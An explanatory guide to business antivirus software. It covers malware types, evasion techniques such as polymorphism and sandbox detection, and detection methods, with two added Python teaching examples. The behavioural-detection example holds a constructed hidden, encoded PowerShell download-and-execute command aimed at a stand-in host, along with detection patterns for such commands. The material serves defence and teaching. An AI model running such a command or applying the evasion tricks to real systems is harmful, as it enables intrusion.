A Guide to Antivirus Software for Businesses

In 1971, an experimental self-replicating program known as Creeper appeared on the ARPANET and is generally regarded as the first computer virus (strictly, the first worm). Ray Tomlinson, a computer scientist better known for inventing network email, responded with Reaper, a program whose only job was to find and delete Creeper. Since then, antivirus software has become one of the most widely deployed controls against malware. According to AV-Test, the number of distinct malware samples registered since 1984 has passed 1.5 billion (1,514,884,906 at the time of writing). Modern antivirus software must be robustly designed to handle this onslaught.
What is Antivirus Software?
Antivirus software (AV) detects the presence of malware, including viruses, on a computer. When it finds something, the AV tool quarantines or removes the malicious software. Traditional antivirus software looks for known indicators of malware, chiefly a "signature": a distinctive byte sequence, or a hash of the file, that identifies a particular strain.
Antivirus software is sometimes built into an operating system, as Microsoft Defender is in Windows. However, research shows that around 121 million US adults also use a third-party AV program, such as Norton AV, Avast, or Bitdefender.
Why Does a Company Need Antivirus Software?

Having a defense against malware infection matters because malware (malicious software, of which viruses are one type) exists to cause harm. Such harms include stealing data and login credentials, encrypting files and extorting a ransom, and turning a computer into a "bot" under a cybercriminal's control. Some examples of malware handled by antivirus software include the following:
Ransomware
Reported ransomware attacks rose 18% year on year. Ransom payments are also spiraling: the largest ransomware payment ever disclosed, $75 million, was paid to the Dark Angels group in 2024.
Infostealers
The latest data shows that 32,339,855 computers have been compromised by infostealer malware. Infostealers run quietly in the background, harvesting data such as saved browser passwords, session cookies, and login credentials, and send it back to the cybercriminals behind the attack. Around one in four cyberattacks involves infostealers.
Trojans
Banking trojans steal banking credentials and make unauthorized transactions, often by overlaying fake login screens on legitimate banking apps or intercepting one-time codes. They exist on desktops as well, but mobile banking trojans installed on smartphones are the fastest-growing variety; attacks have surged by 196%.
There are many other types of malware, including cryptojacking malware, botnets, and spyware. Antivirus software aims to identify viruses, worms, and malware of every kind. However, the cybercriminal world has developed ways of evading antivirus detection.
What about evasive malware and emerging threats?
Cybercriminals, antivirus vendors, and companies are locked in a war of attrition: each time one side develops a new technique, the other must respond. Cybercriminals design malware specifically to evade detection. Evasive techniques include:
Polymorphic Malware
If traditional antivirus software looks for the signature of malware, the obvious way to evade detection is to remove the signature. Polymorphic malware does this by encrypting or otherwise encoding its body with a different key on each new infection and prepending a small decryptor routine, so that no two copies share the same bytes even though they behave identically. Metamorphic malware goes a step further: instead of hiding the same body behind a different key, it rewrites its own code on each generation (reordering instructions, substituting equivalent ones, inserting junk) while maintaining its core functionality, so there is no fixed body to find even after decryption.
Fileless Malware
This form of malware runs in memory only and writes little or nothing to disk. Typically it arrives through a document macro, a malicious script, or an exploit, then lives inside legitimate tools that are already on the system, such as PowerShell, WMI, or rundll32, injecting code into running processes and often persisting only through a registry entry or scheduled task. Because there is no malicious executable on the filesystem to scan, conventional file-based antivirus software has nothing to match against; detection has to come from watching what processes do.
Other methods used to hide malware from conventional AV software include obfuscating the malware code and sandbox-aware behavior. In the latter, the malware checks for signs that it is running inside a sandbox or analysis virtual machine, which is how many security products test suspicious files (for example, too few CPU cores, too little memory, a very short system uptime, no user activity, or known analysis tool names). If it detects such an environment it simply behaves benignly or exits, revealing its real behavior only on a genuine victim machine.
AI-assisted "vibe coding", in which a developer describes what they want and lets a code-generation model write it, is lowering the skill barrier to producing obfuscated and evasive malware.
Techniques Used in Antivirus Software

Antivirus software is itself adjusting to a complex and hostile malware environment. The following techniques are commonly used by conventional AV software, each layering an increasingly sophisticated approach onto virus and malware detection:
Signature Detection
Conventional viruses and other malware contain distinctive byte sequences, or produce a known file hash, that AV software can recognize; this pattern is the "signature". Signature matching is fast and produces very few false positives, but it can only catch what has already been seen and analyzed. Increasingly, malware developers have moved away from static code to dynamic, self-modifying code that is never byte-for-byte identical, which defeats conventional signature matching.
Heuristic-Based Detection
Polymorphic malware evades detection by signature-based antivirus software, and heuristic analysis was developed largely to deal with it. Rather than looking for an exact pattern, heuristic detection inspects a file for suspicious characteristics: a decryption loop followed by an opaque, high-entropy body, code that modifies itself, unusual sequences of system calls, or a section layout that no compiler would produce. Many engines also run the suspicious code in a lightweight emulator for a few thousand instructions, letting a polymorphic decryptor unpack its payload so the now-static body can be matched against signatures. Heuristics catch novel variants that have no signature yet, at the cost of more false positives, so files they flag are usually quarantined for further analysis rather than deleted outright.
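As an added illustration, not code from the original article, the following Python sketch ties together the signature and heuristic sections above and the polymorphic malware section earlier: it shows why a byte signature stops matching once a polymorphic packer re-encrypts the same body with a new key, and how the emulation step in heuristic analysis (unpack first, then match) recovers the detection. The payload text, stub format, rule name and keys are all constructed for the example; real malware is machine code and real polymorphic engines also mutate the decryptor stub itself.

```python
"""Added example (not from the original article): byte signatures versus a
polymorphic variant, and how emulating the decryptor stub restores detection.
The payload, stub format, rule names and keys are constructed for illustration."""
import hashlib
import os
import re
from typing import List, Optional

# Constructed stand-in for a malicious body (real malware would be machine code).
PAYLOAD = b"EVIL: enumerate Documents, encrypt files, drop RANSOM_NOTE.txt"

# A traditional signature: a distinctive byte sequence lifted from one sample.
SIGNATURES = {"Ransom.Demo.A": b"drop RANSOM_NOTE.txt"}

# Toy decryptor stub format: b"STUB:xor:" + 4-byte key + b":" + XORed body.
STUB_RE = re.compile(rb"^STUB:xor:(.{4}):", re.DOTALL)


def xor(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; applying it twice with the same key restores the input."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def signature_scan(data: bytes) -> List[str]:
    """Static signature matching: the exact byte pattern must appear in the file."""
    return [name for name, sig in SIGNATURES.items() if sig in data]


def make_variant(payload: bytes, key: Optional[bytes] = None) -> bytes:
    """Polymorphic packer: same behaviour, different bytes in every copy.
    A real engine would also mutate the stub; here only the key changes."""
    key = key if key is not None else os.urandom(4)
    return b"STUB:xor:" + key + b":" + xor(payload, key)


def emulate_and_scan(data: bytes) -> List[str]:
    """Heuristic/emulation step: recognise a self-decrypting stub, perform the
    decryption it would perform at run time, then apply signatures to the result.
    Files without a stub fall through to plain signature matching."""
    m = STUB_RE.match(data)
    if not m:
        return signature_scan(data)
    decrypted = xor(data[m.end():], m.group(1))
    return [f"{name} (unpacked)" for name in signature_scan(decrypted)]


def sha256(data: bytes) -> str:
    """File-hash 'signature'; changes whenever a single byte changes."""
    return hashlib.sha256(data).hexdigest()


if __name__ == "__main__":
    v1 = make_variant(PAYLOAD, b"\x01\x02\x03\x04")
    v2 = make_variant(PAYLOAD, b"\xaa\xbb\xcc\xdd")
    print("original matches signature:", signature_scan(PAYLOAD))
    print("two variants share a hash:", sha256(v1) == sha256(v2))
    print("signature scan on variant:", signature_scan(v1))
    print("emulation scan on variant:", emulate_and_scan(v1))
```

Two consequences follow from the output. A hash or byte signature taken from one variant is useless against the next, because every copy differs; and once the engine emulates the decryptor instead of trusting the bytes on disk, the old signature works again. Metamorphic code defeats even this, since there is no fixed body after unpacking, which is why the behavioral techniques below are needed as well.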
Sandboxing
A useful aspect of an antivirus solution is the ability to isolate a suspicious file for analysis and testing. Sandboxing places a potential virus or malware sample into an instrumented virtual machine or emulated environment, where it is executed ("detonated") while its file, registry, process, and network activity are recorded. This can be fully automated, with the verdict fed back to the endpoint, or an analyst can step through the program and examine its code by hand. The sandbox-evasion tricks described earlier exist precisely to defeat this step.
Cloud-Based Detection
Organizations increasingly run hybrid networks that mix on-premises systems with public and private clouds. Cloud-based detection moves much of the heavy lifting off the device: the endpoint agent sends a file hash, or a set of extracted features, to the vendor's cloud service, which answers from a reputation database and analysis engines that are far larger and fresher than any locally stored definition set. Because the intelligence lives in the cloud, a threat first seen on one customer's machine can be blocked for everyone within minutes, and updated verdicts can be pushed to devices across the whole network without waiting for a definitions download.
Behavioral Analytics
Behavioral analysis is increasingly driven by machine learning and AI (ML/AI). Instead of asking what a file looks like, it asks what a process does: which child processes it spawns, which files and registry keys it touches, whether it injects into other processes, and where it connects. The ML component builds a baseline of normal activity from observations over time and flags departures from it (an Office application spawning a hidden, encoded PowerShell session, for instance) as likely malware, whatever the bytes on disk look like.
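The following Python example is added here and is not from the original article or any vendor product. It shows the baseline-then-anomaly idea behind behavioral analysis applied to process-creation events, including the fileless pattern described earlier (an Office document spawning a hidden, encoded PowerShell command that downloads and runs code from the network). The telemetry format, field names, sample event lines, and the lists of "office" and "script host" executables are all constructed for illustration; real EDR/NGAV telemetry carries far more fields, but the scoring logic is the same shape.

```python
"""Added example (not from the article): a minimal behavioural baseline over
constructed process-creation events. Learn which parent->child process pairs
are normal, then score live events for departures and for suspicious traits
such as an encoded, hidden PowerShell command spawned by an Office program."""
import base64
import re
from collections import Counter
from typing import Counter as CounterT, List, Optional, Tuple

# Constructed telemetry, one event per line: "parent_image,child_image,command_line"
BASELINE_EVENTS = [
    "explorer.exe,winword.exe,WINWORD.EXE /n report.docx",
    "explorer.exe,chrome.exe,chrome.exe --profile-directory=Default",
    "services.exe,svchost.exe,svchost.exe -k netsvcs",
    "explorer.exe,outlook.exe,OUTLOOK.EXE",
    "winword.exe,splwow64.exe,splwow64.exe 12288",
    "explorer.exe,powershell.exe,powershell.exe -File backup.ps1",
]

# Constructed encoded command, built here so the base64 is guaranteed valid.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
    .encode("utf-16-le")
).decode()

LIVE_EVENTS = [
    "explorer.exe,chrome.exe,chrome.exe --profile-directory=Default",
    f"winword.exe,powershell.exe,powershell.exe -nop -w hidden -enc {ENCODED}",
    "explorer.exe,powershell.exe,powershell.exe -File backup.ps1",
    "svchost.exe,rundll32.exe,rundll32.exe C:\\Users\\Public\\x.dll,Run",
]

# Illustrative lists; a real product would use a much larger, maintained set.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
ENC_RE = re.compile(r"-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)
DOWNLOAD_EXEC_RE = re.compile(r"downloadstring|iex\b|invoke-expression", re.I)


def parse(line: str) -> Tuple[str, str, str]:
    """Split an event line; the command line may itself contain commas."""
    parent, child, cmd = line.split(",", 2)
    return parent.lower(), child.lower(), cmd


def learn_baseline(lines: List[str]) -> CounterT:
    """Baseline = how often each (parent, child) pair was seen in a clean window."""
    return Counter((p, c) for p, c, _ in map(parse, lines))


def decode_encoded_command(cmd: str) -> Optional[str]:
    """PowerShell -EncodedCommand is base64 of UTF-16LE text; decode it if present."""
    m = ENC_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(line: str, baseline: CounterT) -> List[str]:
    """Return the reasons an event looks anomalous; an empty list means benign."""
    parent, child, cmd = parse(line)
    reasons = []
    if (parent, child) not in baseline:
        reasons.append(f"never-seen parent/child pair {parent} -> {child}")
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        reasons.append("office application spawned a script host")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded PowerShell command: " + decoded[:40])
        if DOWNLOAD_EXEC_RE.search(decoded):
            reasons.append("download-and-execute pattern in decoded command")
    lowered = cmd.lower()
    if "-w hidden" in lowered or "-windowstyle hidden" in lowered:
        reasons.append("hidden window requested")
    if re.search(r"\\users\\public\\", cmd, re.I):
        reasons.append("payload loaded from world-writable path")
    return reasons


def triage(lines: List[str], baseline: CounterT) -> List[Tuple[str, List[str]]]:
    """Events with at least one reason, in arrival order, for an analyst to review."""
    alerts = []
    for line in lines:
        reasons = score_event(line, baseline)
        if reasons:
            alerts.append((line, reasons))
    return alerts


if __name__ == "__main__":
    for event, reasons in triage(LIVE_EVENTS, learn_baseline(BASELINE_EVENTS)):
        print(event[:60] + "...")
        for r in reasons:
            print("   -", r)
```

Note what the example does not need: it never looks at a file on disk. The scripted backup run by explorer.exe scores zero because that pair is in the baseline and its command line is plain, while the Word-spawned PowerShell is flagged on several independent grounds, which is how a behavioral engine keeps its false-positive rate down while still catching fileless activity.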
Next-Generation Antivirus Software (NGAV)
The ongoing development of complex and evasive malware has led to a new era in antivirus software. Next-Generation Antivirus Software (NGAV) layers several of the techniques above, using machine learning models trained on large bodies of malicious and benign samples alongside behavioral analysis of running processes, rather than relying on signatures alone. In addition to detecting polymorphic viruses, NGAV can identify fileless malware and previously unseen threats that have no signature yet.
Differences Between Next-Gen AV and Traditional AV Software
| Traditional antivirus software | Next Generation Antivirus Software (NGAV) |
|---|---|
| Based on the detection of malware using code signatures. | Uses multiple layers of techniques to detect viruses that may be evasive. |
| Not able to adapt to changing environmental conditions to identify emerging threats. | Adaptive detection based on machine learning and behavioral analysis. NGAV can detect emerging malware threats that are as yet unrecognized. |
| Signature definitions must be downloaded to each device periodically. Full scans against a large local definition set can slow the computer, and a new threat is only recognized once its signature has been written and distributed. | NGAV is cloud-managed with a lightweight local agent. Threat intelligence updates in near real time on the vendor's side, and much of the analysis is offloaded from the endpoint, reducing (though not eliminating) the local performance cost. |
| Traditional AV software is installed on each endpoint manually or via a server push. Installation and updating of AV software can be time-consuming. | As a cloud-managed architecture, NGAV is easy to deploy and manage from a central console. Delivered as SaaS, it is highly scalable and can be operated by a managed service provider. |
Malware, in all its forms, is a serious problem for organizations worldwide. The impact of malware on a business includes lost revenue, data protection noncompliance fines, loss of customer trust, and operational downtime from ransomware. To reduce these impacts, antivirus software has become an essential part of a cybersecurity strategy.
However, cybercriminals continually strive to stay one step ahead of detection. Evasive malware is now common. Fortunately, the security community has developed antivirus software that is in lockstep with the evasive tactics of cybercriminals. Today, Next Generation Antivirus software utilizes advanced techniques, such as machine learning and behavioral analysis, to prevent emerging threats. Used as part of a broader defense-in-depth approach to security, AV software will help to mitigate harmful threats.
FAQs
What's the difference between NGAV, EDR, and XDR?
Next-Generation Antivirus (NGAV), Endpoint Detection and Response (EDR), and Extended Detection and Response (XDR) work together as part of a Defense in Depth (DiD) approach. NGAV uses machine learning and behavioral analysis to detect and block emerging and evasive malware threats on the endpoint.
EDR software provides visibility and continuous monitoring across all organizational endpoints to identify anomalous behaviors. EDR software then sends alerts with actionable intelligence to security personnel. XDR tools extend the capabilities of EDR tools to the cloud, email, and servers.
Can Next-Generation AV identify emerging threats?
Yes, NGAV is designed to identify emerging threats that cannot be identified using traditional signature-based technology. NGAV uses machine learning, which is trained on real-world threat intelligence. The antivirus engine continually updates its known malware signals. Behavioral analysis is also used by NGAV to set a process baseline for accepted behavior, which is then used to spot anomalous events that could signal malware activity.
Do traditional AV software solutions still offer protection?
Traditional AV software is increasingly being replaced by more advanced technologies. However, some free antivirus products still rely mainly on traditional signature-based engines to detect malicious activity. While these programs still play a part in a broader cybersecurity strategy, blocking the large volume of known, commodity malware cheaply and with few false positives, they are likely to miss evasive and emerging threats that have no signature.